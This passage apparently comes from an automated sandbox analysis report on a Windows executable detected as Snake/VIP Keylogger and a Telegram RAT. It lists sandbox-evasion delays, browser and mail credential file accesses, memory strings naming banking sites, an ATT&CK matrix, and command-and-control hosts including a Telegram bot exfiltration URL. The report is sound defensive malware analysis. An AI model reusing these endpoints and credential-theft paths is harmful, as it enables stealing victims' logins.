                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -599889s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 2412Thread sleep count: 7248 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -599781s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -599672s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -599547s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -599437s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -599328s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -599219s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -599094s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -598984s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -598875s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -598765s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -598656s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -598546s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -598437s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -598328s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -598218s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -598109s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -598000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -597890s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -597781s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -597672s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -597560s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -597453s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -597344s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -597234s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -597125s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -597016s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -596906s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -596797s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -596687s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -596578s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -596469s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -596359s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -596250s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -596141s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -596016s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -595891s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -595781s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -595672s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -595562s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -595453s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -595333s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -595134s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -595030s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -594921s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -594800s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -594685s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -594578s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exe TID: 6752Thread sleep time: -594469s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599889Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599781Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599672Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599547Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599437Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599328Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599219Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 599094Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598984Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598875Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598765Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598656Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598546Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598437Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598328Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598218Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598109Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 598000Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597890Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597781Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597672Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597560Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597453Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597344Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597234Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597125Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 597016Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596906Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596797Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596687Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596578Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596469Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596359Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596250Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596141Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 596016Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595891Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595781Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595672Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595562Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595453Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595333Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595134Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 595030Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594921Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594800Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594685Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594578Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeThread delayed: delay time: 594469Jump to behavior
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                            Source: z1PO7311145.exe, 00000000.00000002.3694144020.00000000010D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                            Source: z1PO7311145.exe, 00000000.00000002.3697607782.0000000004189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeCode function: 0_2_06B39548 LdrInitializeThunk,0_2_06B39548
                            Source: C:\Users\user\Desktop\z1PO7311145.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeQueries volume information: C:\Users\user\Desktop\z1PO7311145.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Snake Keylogger
                            Source: Yara matchFile source: 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: z1PO7311145.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTR
                            Yara detected VIP Keylogger
                            Source: Yara matchFile source: z1PO7311145.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTR
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\Desktop\z1PO7311145.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                            Tries to steal Mail credentials (via file / registry access)
                            Source: C:\Users\user\Desktop\z1PO7311145.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                            Source: C:\Users\user\Desktop\z1PO7311145.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                            Source: Yara matchFile source: z1PO7311145.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected Snake Keylogger
                            Source: Yara matchFile source: 00000000.00000002.3696383781.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: z1PO7311145.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTR
                            Yara detected VIP Keylogger
                            Source: Yara matchFile source: z1PO7311145.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.z1PO7311145.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.3696383781.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1238227546.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: z1PO7311145.exe PID: 6492, type: MEMORYSTR

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		1
                            Security Software Discovery                            		Remote Services1
                            Email Collection                            		1
                            Web Service                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
                            Virtualization/Sandbox Evasion                            		LSASS Memory1
                            Process Discovery                            		Remote Desktop Protocol11
                            Archive Collected Data                            		11
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                            Deobfuscate/Decode Files or Information                            		Security Account Manager31
                            Virtualization/Sandbox Evasion                            		SMB/Windows Admin Shares1
                            Data from Local System                            		3
                            Ingress Tool Transfer                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                            Obfuscated Files or Information                            		NTDS1
                            Application Window Discovery                            		Distributed Component Object ModelInput Capture3
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets1
                            System Network Configuration Discovery                            		SSHKeylogging14
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials13
                            System Information Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            z1PO7311145.exe74%ReversingLabsByteCode-MSIL.Spyware.Snakekeylogger
                            z1PO7311145.exe100%AviraHEUR/AGEN.1307591
                            z1PO7311145.exe100%Joe Sandbox ML

                            Dropped Files

                            No Antivirus matches

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                            http://checkip.dyndns.org0%URL Reputationsafe
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                            https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                            https://www.ecosia.org/newtab/0%URL Reputationsafe
                            http://varders.kozow.com:80810%URL Reputationsafe
                            http://aborters.duckdns.org:8081100%URL Reputationmalware
                            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                            http://checkip.dyndns.org/0%URL Reputationsafe
                            http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                            https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                            http://anotherarmy.dns.army:8081100%URL Reputationmalware
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                            http://checkip.dyndns.org/q0%URL Reputationsafe
                            https://reallyfreegeoip.org0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                            http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                            https://reallyfreegeoip.org/xml/0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            mail.electradubai.com
                            		192.250.231.25
                            		truetrue
                              		unknown
                              reallyfreegeoip.org
                              		188.114.97.3
                              		truetrue
                                		unknown
                                api.telegram.org
                                		149.154.167.220
                                		truetrue
                                  		unknown
                                  checkip.dyndns.com
                                  		158.101.44.242
                                  		truefalse
                                    		unknown
                                    checkip.dyndns.org
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://reallyfreegeoip.org/xml/8.46.123.33false
                                      • URL Reputation: safe
                                      		unknown
                                      http://checkip.dyndns.org/false
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:27:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://www.office.com/z1PO7311145.exe, 00000000.00000002.3696383781.0000000003086000.00000004.00000800.00020000.00000000.sdmp, z1PO7311145.exe, 00000000.00000002.3696383781.0000000003077000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://duckduckgo.com/chrome_newtabz1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://duckduckgo.com/ac/?q=z1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.telegram.orgz1PO7311145.exe, 00000000.00000002.3696383781.0000000002FA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoz1PO7311145.exe, 00000000.00000002.3697607782.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
